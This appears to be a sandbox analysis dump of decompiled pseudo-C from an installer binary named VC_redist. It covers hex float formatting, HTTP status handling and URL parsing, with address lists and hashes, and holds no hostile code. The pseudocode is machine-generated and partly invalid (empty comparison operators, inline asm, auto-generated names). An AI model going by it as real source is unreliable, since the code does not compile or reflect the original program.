                                                                          				void* _t171;
                                                                          				signed int* _t172;
                                                                          				signed int _t174;
                                                                          				signed int _t181;
                                                                          				signed int _t182;
                                                                          				signed int _t183;
                                                                          				signed int _t184;
                                                                          				signed int _t185;
                                                                          				signed int _t186;
                                                                          				signed int _t187;
                                                                          
                                                                          				_t171 = __edx;
                                                                          				_t181 = _a24;
                                                                          				if(_t181 < 0) {
                                                                          					_t181 = 0;
                                                                          				}
                                                                          				_t184 = _a8;
                                                                          				 *_t184 = 0;
                                                                          				E000419B7(0,  &_v52, _t171, _a36);
                                                                          				_t5 = _t181 + 0xb; // 0xb
                                                                          				if(_a12 > _t5) {
                                                                          					_t172 = _a4;
                                                                          					_t142 = _t172[1];
                                                                          					_v36 =  *_t172;
                                                                          					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                                          					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                                          						L11:
                                                                          						__eflags = _t142 & 0x80000000;
                                                                          						if((_t142 & 0x80000000) != 0) {
                                                                          							 *_t184 = 0x2d;
                                                                          							_t184 = _t184 + 1;
                                                                          							__eflags = _t184;
                                                                          						}
                                                                          						__eflags = _a28;
                                                                          						_v16 = 0x3ff;
                                                                          						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                                          						__eflags = _t172[1] & 0x7ff00000;
                                                                          						_v32 = _t136;
                                                                          						_t86 = 0x30;
                                                                          						if((_t172[1] & 0x7ff00000) != 0) {
                                                                          							 *_t184 = 0x31;
                                                                          							_t185 = _t184 + 1;
                                                                          							__eflags = _t185;
                                                                          						} else {
                                                                          							 *_t184 = _t86;
                                                                          							_t185 = _t184 + 1;
                                                                          							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                                          							__eflags = _t164;
                                                                          							if(_t164 != 0) {
                                                                          								_v16 = 0x3fe;
                                                                          							} else {
                                                                          								_v16 = _v16 & _t164;
                                                                          							}
                                                                          						}
                                                                          						_t146 = _t185;
                                                                          						_t186 = _t185 + 1;
                                                                          						_v28 = _t146;
                                                                          						__eflags = _t181;
                                                                          						if(_t181 != 0) {
                                                                          							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
                                                                          						} else {
                                                                          							 *_t146 = 0;
                                                                          						}
                                                                          						_t92 = _t172[1] & 0x000fffff;
                                                                          						__eflags = _t92;
                                                                          						_v20 = _t92;
                                                                          						if(_t92 > 0) {
                                                                          							L23:
                                                                          							_t33 =  &_v8;
                                                                          							 *_t33 = _v8 & 0x00000000;
                                                                          							__eflags =  *_t33;
                                                                          							_t147 = 0xf0000;
                                                                          							_t93 = 0x30;
                                                                          							_v12 = _t93;
                                                                          							_v20 = 0xf0000;
                                                                          							do {
                                                                          								__eflags = _t181;
                                                                          								if(_t181 <= 0) {
                                                                          									break;
                                                                          								}
                                                                          								_t119 = E00059DD0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                          								_t161 = 0x30;
                                                                          								_t121 = _t119 + _t161 & 0x0000ffff;
                                                                          								__eflags = _t121 - 0x39;
                                                                          								if(_t121 > 0x39) {
                                                                          									_t121 = _t121 + _t136;
                                                                          									__eflags = _t121;
                                                                          								}
                                                                          								_t162 = _v20;
                                                                          								_t172 = _a4;
                                                                          								 *_t186 = _t121;
                                                                          								_t186 = _t186 + 1;
                                                                          								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                                          								_t147 = _t162 >> 4;
                                                                          								_t93 = _v12 - 4;
                                                                          								_t181 = _t181 - 1;
                                                                          								_v20 = _t162 >> 4;
                                                                          								_v12 = _t93;
                                                                          								__eflags = _t93;
                                                                          							} while (_t93 >= 0);
                                                                          							__eflags = _t93;
                                                                          							if(_t93 < 0) {
                                                                          								goto L39;
                                                                          							}
                                                                          							_t115 = E00059DD0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                          							__eflags = _t115 - 8;
                                                                          							if(_t115 <= 8) {
                                                                          								goto L39;
                                                                          							}
                                                                          							_t54 = _t186 - 1; // 0x42e28
                                                                          							_t116 = _t54;
                                                                          							_t138 = 0x30;
                                                                          							while(1) {
                                                                          								_t156 =  *_t116;
                                                                          								__eflags = _t156 - 0x66;
                                                                          								if(_t156 == 0x66) {
                                                                          									goto L33;
                                                                          								}
                                                                          								__eflags = _t156 - 0x46;
                                                                          								if(_t156 != 0x46) {
                                                                          									_t139 = _v32;
                                                                          									__eflags = _t116 - _v28;
                                                                          									if(_t116 == _v28) {
                                                                          										_t57 = _t116 - 1;
                                                                          										 *_t57 =  *(_t116 - 1) + 1;
                                                                          										__eflags =  *_t57;
                                                                          									} else {
                                                                          										_t157 =  *_t116;
                                                                          										__eflags = _t157 - 0x39;
                                                                          										if(_t157 != 0x39) {
                                                                          											 *_t116 = _t157 + 1;
                                                                          										} else {
                                                                          											 *_t116 = _t139 + 0x3a;
                                                                          										}
                                                                          									}
                                                                          									goto L39;
                                                                          								}
                                                                          								L33:
                                                                          								 *_t116 = _t138;
                                                                          								_t116 = _t116 - 1;
                                                                          							}
                                                                          						} else {
                                                                          							__eflags =  *_t172;
                                                                          							if( *_t172 <= 0) {
                                                                          								L39:
                                                                          								__eflags = _t181;
                                                                          								if(_t181 > 0) {
                                                                          									_push(_t181);
                                                                          									_t111 = 0x30;
                                                                          									_push(_t111);
                                                                          									_push(_t186);
                                                                          									E0003F670(_t181);
                                                                          									_t186 = _t186 + _t181;
                                                                          									__eflags = _t186;
                                                                          								}
                                                                          								_t94 = _v28;
                                                                          								__eflags =  *_t94;
                                                                          								if( *_t94 == 0) {
                                                                          									_t186 = _t94;
                                                                          								}
                                                                          								__eflags = _a28;
                                                                          								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                          								_t174 = _a4[1];
                                                                          								_t100 = E00059DD0( *_a4, 0x34, _t174);
                                                                          								_t137 = 0;
                                                                          								_t151 = (_t100 & 0x000007ff) - _v16;
                                                                          								__eflags = _t151;
                                                                          								asm("sbb ebx, ebx");
                                                                          								if(__eflags < 0) {
                                                                          									L47:
                                                                          									 *(_t186 + 1) = 0x2d;
                                                                          									_t187 = _t186 + 2;
                                                                          									__eflags = _t187;
                                                                          									_t151 =  ~_t151;
                                                                          									asm("adc ebx, 0x0");
                                                                          									_t137 =  ~_t137;
                                                                          									goto L48;
                                                                          								} else {
                                                                          									if(__eflags > 0) {
                                                                          										L46:
                                                                          										 *(_t186 + 1) = 0x2b;
                                                                          										_t187 = _t186 + 2;
                                                                          										L48:
                                                                          										_t182 = _t187;
                                                                          										_t101 = 0x30;
                                                                          										 *_t187 = _t101;
                                                                          										__eflags = _t137;
                                                                          										if(__eflags < 0) {
                                                                          											L56:
                                                                          											__eflags = _t187 - _t182;
                                                                          											if(_t187 != _t182) {
                                                                          												L60:
                                                                          												_push(0);
                                                                          												_push(0xa);
                                                                          												_push(_t137);
                                                                          												_push(_t151);
                                                                          												_t102 = E00059CF0();
                                                                          												_v32 = _t174;
                                                                          												 *_t187 = _t102 + 0x30;
                                                                          												_t187 = _t187 + 1;
                                                                          												__eflags = _t187;
                                                                          												L61:
                                                                          												_t104 = 0x30;
                                                                          												_t183 = 0;
                                                                          												__eflags = 0;
                                                                          												 *_t187 = _t151 + _t104;
                                                                          												 *(_t187 + 1) = 0;
                                                                          												goto L62;
                                                                          											}
                                                                          											__eflags = _t137;
                                                                          											if(__eflags < 0) {
                                                                          												goto L61;
                                                                          											}
                                                                          											if(__eflags > 0) {
                                                                          												goto L60;
                                                                          											}
                                                                          											__eflags = _t151 - 0xa;
                                                                          											if(_t151 < 0xa) {
                                                                          												goto L61;
                                                                          											}
                                                                          											goto L60;
                                                                          										}
                                                                          										if(__eflags > 0) {
                                                                          											L51:
                                                                          											_push(0);
                                                                          											_push(0x3e8);
                                                                          											_push(_t137);
                                                                          											_push(_t151);
                                                                          											_t107 = E00059CF0();
                                                                          											_v32 = _t174;
                                                                          											 *_t187 = _t107 + 0x30;
                                                                          											_t187 = _t187 + 1;
                                                                          											__eflags = _t187 - _t182;
                                                                          											if(_t187 != _t182) {
                                                                          												L55:
                                                                          												_push(0);
                                                                          												_push(0x64);
                                                                          												_push(_t137);
                                                                          												_push(_t151);
                                                                          												_t109 = E00059CF0();
                                                                          												_v32 = _t174;
                                                                          												 *_t187 = _t109 + 0x30;
                                                                          												_t187 = _t187 + 1;
                                                                          												__eflags = _t187;
                                                                          												goto L56;
                                                                          											}
                                                                          											L52:
                                                                          											__eflags = _t137;
                                                                          											if(__eflags < 0) {
                                                                          												goto L56;
                                                                          											}
                                                                          											if(__eflags > 0) {
                                                                          												goto L55;
                                                                          											}
                                                                          											__eflags = _t151 - 0x64;
                                                                          											if(_t151 < 0x64) {
                                                                          												goto L56;
                                                                          											}
                                                                          											goto L55;
                                                                          										}
                                                                          										__eflags = _t151 - 0x3e8;
                                                                          										if(_t151 < 0x3e8) {
                                                                          											goto L52;
                                                                          										}
                                                                          										goto L51;
                                                                          									}
                                                                          									__eflags = _t151;
                                                                          									if(_t151 < 0) {
                                                                          										goto L47;
                                                                          									}
                                                                          									goto L46;
                                                                          								}
                                                                          							}
                                                                          							goto L23;
                                                                          						}
                                                                          					}
                                                                          					__eflags = 0;
                                                                          					if(0 != 0) {
                                                                          						goto L11;
                                                                          					} else {
                                                                          						_t183 = E00046D79(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                                          						__eflags = _t183;
                                                                          						if(_t183 == 0) {
                                                                          							_t128 = E00059F30(_t184, 0x65);
                                                                          							_pop(_t166);
                                                                          							__eflags = _t128;
                                                                          							if(_t128 != 0) {
                                                                          								__eflags = _a28;
                                                                          								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                          								__eflags = _t170;
                                                                          								 *_t128 = _t170;
                                                                          								 *((char*)(_t128 + 3)) = 0;
                                                                          							}
                                                                          							_t183 = 0;
                                                                          						} else {
                                                                          							 *_t184 = 0;
                                                                          						}
                                                                          						goto L62;
                                                                          					}
                                                                          				} else {
                                                                          					_t129 = E00043E36();
                                                                          					_t183 = 0x22;
                                                                          					 *_t129 = _t183;
                                                                          					E00043D7A();
                                                                          					L62:
                                                                          					if(_v40 != 0) {
                                                                          						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                                          					}
                                                                          					return _t183;
                                                                          				}
                                                                          			}

                                                                          0x00000000
                                                                          0x00046c3c
                                                                          0x00046c41
                                                                          0x00046c45
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046c49
                                                                          0x00046c49
                                                                          0x00046c4c
                                                                          0x00046c4d
                                                                          0x00046c4d
                                                                          0x00046c4f
                                                                          0x00046c52
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046c54
                                                                          0x00046c57
                                                                          0x00046c5e
                                                                          0x00046c61
                                                                          0x00046c64
                                                                          0x00046c7a
                                                                          0x00046c7a
                                                                          0x00046c7a
                                                                          0x00046c66
                                                                          0x00046c66
                                                                          0x00046c68
                                                                          0x00046c6b
                                                                          0x00046c76
                                                                          0x00046c6d
                                                                          0x00046c70
                                                                          0x00046c70
                                                                          0x00046c6b
                                                                          0x00000000
                                                                          0x00046c64
                                                                          0x00046c59
                                                                          0x00046c59
                                                                          0x00046c5b
                                                                          0x00046c5b
                                                                          0x00046baf
                                                                          0x00046baf
                                                                          0x00046bb2
                                                                          0x00046c7d
                                                                          0x00046c7d
                                                                          0x00046c7f
                                                                          0x00046c81
                                                                          0x00046c84
                                                                          0x00046c85
                                                                          0x00046c86
                                                                          0x00046c87
                                                                          0x00046c8f
                                                                          0x00046c8f
                                                                          0x00046c8f
                                                                          0x00046c91
                                                                          0x00046c94
                                                                          0x00046c97
                                                                          0x00046c99
                                                                          0x00046c99
                                                                          0x00046c9b
                                                                          0x00046cad
                                                                          0x00046cb1
                                                                          0x00046cb4
                                                                          0x00046cbb
                                                                          0x00046cc3
                                                                          0x00046cc3
                                                                          0x00046cc6
                                                                          0x00046cc8
                                                                          0x00046cd9
                                                                          0x00046cd9
                                                                          0x00046cdd
                                                                          0x00046cdd
                                                                          0x00046ce0
                                                                          0x00046ce2
                                                                          0x00046ce5
                                                                          0x00000000
                                                                          0x00046cca
                                                                          0x00046cca
                                                                          0x00046cd0
                                                                          0x00046cd0
                                                                          0x00046cd4
                                                                          0x00046ce7
                                                                          0x00046ce7
                                                                          0x00046ceb
                                                                          0x00046cec
                                                                          0x00046cee
                                                                          0x00046cf0
                                                                          0x00046d31
                                                                          0x00046d31
                                                                          0x00046d33
                                                                          0x00046d40
                                                                          0x00046d40
                                                                          0x00046d42
                                                                          0x00046d44
                                                                          0x00046d45
                                                                          0x00046d46
                                                                          0x00046d4d
                                                                          0x00046d50
                                                                          0x00046d52
                                                                          0x00046d52
                                                                          0x00046d53
                                                                          0x00046d55
                                                                          0x00046d58
                                                                          0x00046d58
                                                                          0x00046d5a
                                                                          0x00046d5c
                                                                          0x00000000
                                                                          0x00046d5c
                                                                          0x00046d35
                                                                          0x00046d37
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046d39
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046d3b
                                                                          0x00046d3e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046d3e
                                                                          0x00046cf7
                                                                          0x00046cfd
                                                                          0x00046cfd
                                                                          0x00046cff
                                                                          0x00046d00
                                                                          0x00046d01
                                                                          0x00046d02
                                                                          0x00046d09
                                                                          0x00046d0c
                                                                          0x00046d0e
                                                                          0x00046d0f
                                                                          0x00046d11
                                                                          0x00046d1e
                                                                          0x00046d1e
                                                                          0x00046d20
                                                                          0x00046d22
                                                                          0x00046d23
                                                                          0x00046d24
                                                                          0x00046d2b
                                                                          0x00046d2e
                                                                          0x00046d30
                                                                          0x00046d30
                                                                          0x00000000
                                                                          0x00046d30
                                                                          0x00046d13
                                                                          0x00046d13
                                                                          0x00046d15
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046d17
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046d19
                                                                          0x00046d1c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046d1c
                                                                          0x00046cf9
                                                                          0x00046cfb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046cfb
                                                                          0x00046ccc
                                                                          0x00046cce
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046cce
                                                                          0x00046cc8
                                                                          0x00000000
                                                                          0x00046bb2
                                                                          0x00046bad
                                                                          0x00046ad4
                                                                          0x00046ad6
                                                                          0x00000000
                                                                          0x00046ad8
                                                                          0x00046aee
                                                                          0x00046af3
                                                                          0x00046af5
                                                                          0x00046b01
                                                                          0x00046b07
                                                                          0x00046b08
                                                                          0x00046b0a
                                                                          0x00046b0c
                                                                          0x00046b17
                                                                          0x00046b17
                                                                          0x00046b1a
                                                                          0x00046b1c
                                                                          0x00046b1c
                                                                          0x00046b1f
                                                                          0x00046af7
                                                                          0x00046af7
                                                                          0x00046af7
                                                                          0x00000000
                                                                          0x00046af5
                                                                          0x00046aa4
                                                                          0x00046aa4
                                                                          0x00046aab
                                                                          0x00046aac
                                                                          0x00046aae
                                                                          0x00046d60
                                                                          0x00046d64
                                                                          0x00046d69
                                                                          0x00046d69
                                                                          0x00046d78
                                                                          0x00046d78

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: __alldvrm$_strrchr
                                                                          • String ID:
                                                                          • API String ID: 1036877536-0
                                                                          • Opcode ID: f3a74c95afe91129e83f4a200ae329e72b68e1b987d16e4549aa364eb4fd1ab8
                                                                          • Instruction ID: 887eeff7fe7c5cc79dc9b2d855805cadb8fed0650121a4fd5db0fdb232bac6b5
                                                                          • Opcode Fuzzy Hash: f3a74c95afe91129e83f4a200ae329e72b68e1b987d16e4549aa364eb4fd1ab8
                                                                          • Instruction Fuzzy Hash: 91A148B1E003869FDB25CF18C8917BEBBE5EF12310F14417ED8859B282E7369941C75A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 62%
                                                                          			E0005602B(signed int __ecx, intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, signed int* _a20) {
                                                                          				signed int _v8;
                                                                          				signed int _t25;
                                                                          				signed int* _t29;
                                                                          				signed int* _t37;
                                                                          				signed int _t48;
                                                                          				intOrPtr _t50;
                                                                          				signed int _t53;
                                                                          				void* _t58;
                                                                          				void* _t62;
                                                                          				void* _t63;
                                                                          				void* _t64;
                                                                          
                                                                          				_t39 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t37 = _a16;
                                                                          				_t50 = _a4;
                                                                          				while(1) {
                                                                          					_a16 = _a16 & 0x00000000;
                                                                          					_push(0);
                                                                          					_push(0);
                                                                          					_push(0);
                                                                          					_push(0);
                                                                          					_push(_t50);
                                                                          					if( *0x7a984() != 0) {
                                                                          						_t53 = E00058924(_t39, _t50, 0x13,  &_v8);
                                                                          						__eflags = _t53;
                                                                          					} else {
                                                                          						_t53 =  <=  ? GetLastError() : _t31 & 0x0000ffff | 0x80070000;
                                                                          						E0005012F(_t53, "Failed to send request to URL: %ls, trying to process HTTP status code anyway.",  *_a8);
                                                                          						_t58 = _t58 + 0xc;
                                                                          						_t62 = E00058924(_t39, _t50, 0x13,  &_v8);
                                                                          					}
                                                                          					if(_t62 < 0) {
                                                                          						break;
                                                                          					}
                                                                          					_t25 = _v8;
                                                                          					_t39 = 0x194;
                                                                          					_t63 = _t25 - 0x194;
                                                                          					if(_t63 > 0) {
                                                                          						_t39 = 0x19e;
                                                                          						__eflags = _t25 - 0x19e;
                                                                          						if(__eflags > 0) {
                                                                          							_t39 = _t25 - 0x1f6;
                                                                          							__eflags = _t39;
                                                                          							if(_t39 == 0) {
                                                                          								L40:
                                                                          								_t53 = 0x80070003;
                                                                          								L41:
                                                                          								if(_a16 != 0) {
                                                                          									continue;
                                                                          								}
                                                                          								break;
                                                                          							}
                                                                          							_t39 = _t39 - 1;
                                                                          							__eflags = _t39;
                                                                          							if(_t39 == 0) {
                                                                          								goto L40;
                                                                          							}
                                                                          							_t39 = _t39 - 1;
                                                                          							__eflags = _t39;
                                                                          							if(_t39 == 0) {
                                                                          								L39:
                                                                          								_t53 = 0x80070102;
                                                                          								goto L41;
                                                                          							}
                                                                          							L38:
                                                                          							__eflags = _t53;
                                                                          							_t53 =  >=  ? 0x8000ffff : _t53;
                                                                          							_t39 = _a8;
                                                                          							_push( *_a8);
                                                                          							E0005012F(_t53, "Unknown HTTP status code %d, returned from URL: %ls", _t25);
                                                                          							_t58 = _t58 + 0x10;
                                                                          							goto L41;
                                                                          						}
                                                                          						if(__eflags == 0) {
                                                                          							_t53 = 0x80010135;
                                                                          							goto L41;
                                                                          						}
                                                                          						_t39 = _t25 - 0x195;
                                                                          						__eflags = _t39;
                                                                          						if(_t39 == 0) {
                                                                          							_t53 = 0x80070032;
                                                                          							goto L41;
                                                                          						}
                                                                          						_t39 = _t39;
                                                                          						__eflags = _t39;
                                                                          						if(_t39 == 0) {
                                                                          							L30:
                                                                          							_a16 = _a16 & 0x00000000;
                                                                          							_t53 = 0x80070005;
                                                                          							 *_t37 =  *_t37 & 0x00000000;
                                                                          							_t48 = _a12;
                                                                          							__eflags = _t48;
                                                                          							if(_t48 != 0) {
                                                                          								_t39 =  *_t48;
                                                                          								__eflags = _t39;
                                                                          								if(_t39 != 0) {
                                                                          									_t53 =  *_t39( *((intOrPtr*)(_t48 + 4)), _t50, _t25,  &_a16, _t37);
                                                                          								}
                                                                          							}
                                                                          							goto L41;
                                                                          						}
                                                                          						_t39 = _t39 - 1;
                                                                          						__eflags = _t39;
                                                                          						if(_t39 == 0) {
                                                                          							goto L39;
                                                                          						}
                                                                          						_t39 = _t39;
                                                                          						__eflags = _t39;
                                                                          						if(_t39 != 0) {
                                                                          							goto L38;
                                                                          						}
                                                                          						L29:
                                                                          						_t53 = 0x80070002;
                                                                          						goto L41;
                                                                          					}
                                                                          					if(_t63 == 0) {
                                                                          						goto L29;
                                                                          					}
                                                                          					_t39 = 0x12f;
                                                                          					_t64 = _t25 - 0x194;
                                                                          					if(_t64 > 0) {
                                                                          						_t39 = _t25 - 0x190;
                                                                          						__eflags = _t39;
                                                                          						if(_t39 == 0) {
                                                                          							_t53 = 0x800700a1;
                                                                          							goto L41;
                                                                          						}
                                                                          						_t39 = _t39 - 1;
                                                                          						__eflags = _t39;
                                                                          						if(_t39 == 0) {
                                                                          							goto L30;
                                                                          						}
                                                                          						_t39 = _t39;
                                                                          						__eflags = _t39;
                                                                          						if(_t39 != 0) {
                                                                          							goto L38;
                                                                          						}
                                                                          						_t53 = 0x80070005;
                                                                          						goto L41;
                                                                          					}
                                                                          					if(_t64 == 0) {
                                                                          						L13:
                                                                          						_t53 = E0005898E(_t39, _t50, 0x33, _a8);
                                                                          						if(_t53 < 0) {
                                                                          							break;
                                                                          						} else {
                                                                          							 *_t37 = 1;
                                                                          							goto L41;
                                                                          						}
                                                                          					}
                                                                          					_t39 = _t25 - 0xc8;
                                                                          					if(_t39 == 0) {
                                                                          						_t29 = _a20;
                                                                          						 *_t29 =  *_t29 & 0x00000000;
                                                                          						__eflags =  *_t29;
                                                                          						L17:
                                                                          						_t53 = 0;
                                                                          						goto L41;
                                                                          					}
                                                                          					_t39 = _t39 - 6;
                                                                          					if(_t39 == 0) {
                                                                          						 *_a20 = 1;
                                                                          						goto L17;
                                                                          					}
                                                                          					_t39 = _t39 - 0x5f;
                                                                          					if(_t39 == 0 || _t39 == 0) {
                                                                          						goto L13;
                                                                          					} else {
                                                                          						goto L38;
                                                                          					}
                                                                          				}
                                                                          				return _t53;
                                                                          			}















                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00056053
                                                                            • Part of subcall function 00058924: GetLastError.KERNEL32(?,?,?,00056096,?,00000013,00000000), ref: 00058957
                                                                          Strings
                                                                          • Failed to send request to URL: %ls, trying to process HTTP status code anyway., xrefs: 0005606C
                                                                          • Unknown HTTP status code %d, returned from URL: %ls, xrefs: 000561C9
                                                                          • @Met, xrefs: 00056053
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: @Met$Failed to send request to URL: %ls, trying to process HTTP status code anyway.$Unknown HTTP status code %d, returned from URL: %ls
                                                                          • API String ID: 1452528299-1126727395
                                                                          • Opcode ID: 1f6d762ba769eccad25d6abf27498cf246b1a7d147f2b2754db1c9c5efaabdff
                                                                          • Instruction ID: 16e6146850c410d6e8d77c4d2ced0ec4163a9aae08015b8e7663f7e3de860a77
                                                                          • Opcode Fuzzy Hash: 1f6d762ba769eccad25d6abf27498cf246b1a7d147f2b2754db1c9c5efaabdff
                                                                          • Instruction Fuzzy Hash: 49412B36A40915A7DB795D68CD2577F3AD8EB01323F5D412DFD02AB2D2CA27CE0882D9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 78%
                                                                          			E00058A55(void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, short* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                          				signed int _v8;
                                                                          				char _v268;
                                                                          				char _v528;
                                                                          				char _v1044;
                                                                          				char _v5144;
                                                                          				char _v9244;
                                                                          				intOrPtr _v9248;
                                                                          				intOrPtr _v9252;
                                                                          				intOrPtr _v9256;
                                                                          				intOrPtr _v9260;
                                                                          				intOrPtr* _v9264;
                                                                          				short* _v9268;
                                                                          				intOrPtr _v9272;
                                                                          				char* _v9276;
                                                                          				intOrPtr _v9280;
                                                                          				char* _v9284;
                                                                          				intOrPtr _v9288;
                                                                          				char* _v9292;
                                                                          				intOrPtr _v9296;
                                                                          				char* _v9300;
                                                                          				short _v9304;
                                                                          				intOrPtr _v9308;
                                                                          				char* _v9312;
                                                                          				intOrPtr _v9316;
                                                                          				char _v9328;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t57;
                                                                          				short* _t70;
                                                                          				void* _t76;
                                                                          				void* _t77;
                                                                          				void* _t78;
                                                                          				void* _t79;
                                                                          				signed short _t81;
                                                                          				intOrPtr _t90;
                                                                          				void* _t91;
                                                                          				intOrPtr* _t94;
                                                                          				void* _t98;
                                                                          				intOrPtr _t100;
                                                                          				void* _t101;
                                                                          				void* _t104;
                                                                          				signed int _t108;
                                                                          
                                                                          				_t98 = __edx;
                                                                          				E00059F00();
                                                                          				_t57 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t57 ^ _t108;
                                                                          				_v9260 = _a4;
                                                                          				_v9264 = _a8;
                                                                          				_t90 = _a28;
                                                                          				_v9248 = _a12;
                                                                          				_v9268 = _a16;
                                                                          				_t103 = 0;
                                                                          				_t100 = _a32;
                                                                          				_v9252 = _a20;
                                                                          				_v9256 = _a24;
                                                                          				E0003F670(_t100,  &_v9328, 0, 0x3c);
                                                                          				_v9328 = 0x3c;
                                                                          				if(_v9248 != 0) {
                                                                          					_v9308 = 0x101;
                                                                          					_v9312 =  &_v1044;
                                                                          				}
                                                                          				if(_v9252 != _t103) {
                                                                          					_v9296 = 0x81;
                                                                          					_v9300 =  &_v268;
                                                                          				}
                                                                          				if(_v9256 != _t103) {
                                                                          					_v9288 = 0x81;
                                                                          					_v9292 =  &_v528;
                                                                          				}
                                                                          				if(_t90 != 0) {
                                                                          					_v9280 = 0x801;
                                                                          					_v9284 =  &_v5144;
                                                                          				}
                                                                          				if(_t100 != 0) {
                                                                          					_v9272 = 0x801;
                                                                          					_v9276 =  &_v9244;
                                                                          				}
                                                                          				_push( &_v9328);
                                                                          				_push(0x90000000);
                                                                          				_push(_t103);
                                                                          				_push(_v9260);
                                                                          				if( *0x7a990() != 0) {
                                                                          					_t94 = _v9264;
                                                                          					if(_t94 != 0) {
                                                                          						 *_t94 = _v9316;
                                                                          					}
                                                                          					_t69 = _v9248;
                                                                          					if(_v9248 == 0) {
                                                                          						L16:
                                                                          						_t70 = _v9268;
                                                                          						if(_t70 != 0) {
                                                                          							 *_t70 = _v9304;
                                                                          						}
                                                                          						_t71 = _v9252;
                                                                          						if(_v9252 == 0) {
                                                                          							L20:
                                                                          							_t72 = _v9256;
                                                                          							if(_v9256 == 0) {
                                                                          								L22:
                                                                          								if(_t90 == 0) {
                                                                          									L24:
                                                                          									if(_t100 != 0) {
                                                                          										_t103 = E000121A5(_t100, _v9276, _v9272);
                                                                          									}
                                                                          									goto L26;
                                                                          								}
                                                                          								_t76 = E000121A5(_t90, _v9284, _v9280);
                                                                          								_t103 = _t76;
                                                                          								if(_t76 < 0) {
                                                                          									goto L26;
                                                                          								}
                                                                          								goto L24;
                                                                          							}
                                                                          							_t77 = E000121A5(_t72, _v9292, _v9288);
                                                                          							_t103 = _t77;
                                                                          							if(_t77 < 0) {
                                                                          								goto L26;
                                                                          							}
                                                                          							goto L22;
                                                                          						} else {
                                                                          							_t78 = E000121A5(_t71, _v9300, _v9296);
                                                                          							_t103 = _t78;
                                                                          							if(_t78 < 0) {
                                                                          								goto L26;
                                                                          							}
                                                                          							goto L20;
                                                                          						}
                                                                          					} else {
                                                                          						_t79 = E000121A5(_t69, _v9312, _v9308);
                                                                          						_t103 = _t79;
                                                                          						if(_t79 < 0) {
                                                                          							goto L26;
                                                                          						}
                                                                          						goto L16;
                                                                          					}
                                                                          				} else {
                                                                          					_t81 = GetLastError();
                                                                          					_t107 =  <=  ? _t81 : _t81 & 0x0000ffff | 0x80070000;
                                                                          					_t103 =  >=  ? 0x80004005 :  <=  ? _t81 : _t81 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "uriutil.cpp", 0x56,  >=  ? 0x80004005 :  <=  ? _t81 : _t81 & 0x0000ffff | 0x80070000);
                                                                          					L26:
                                                                          					_pop(_t101);
                                                                          					_pop(_t104);
                                                                          					_pop(_t91);
                                                                          					return E0003DE36(_t91, _v8 ^ _t108, _t98, _t101, _t104);
                                                                          				}
                                                                          			}


                                                                          APIs
                                                                          Strings
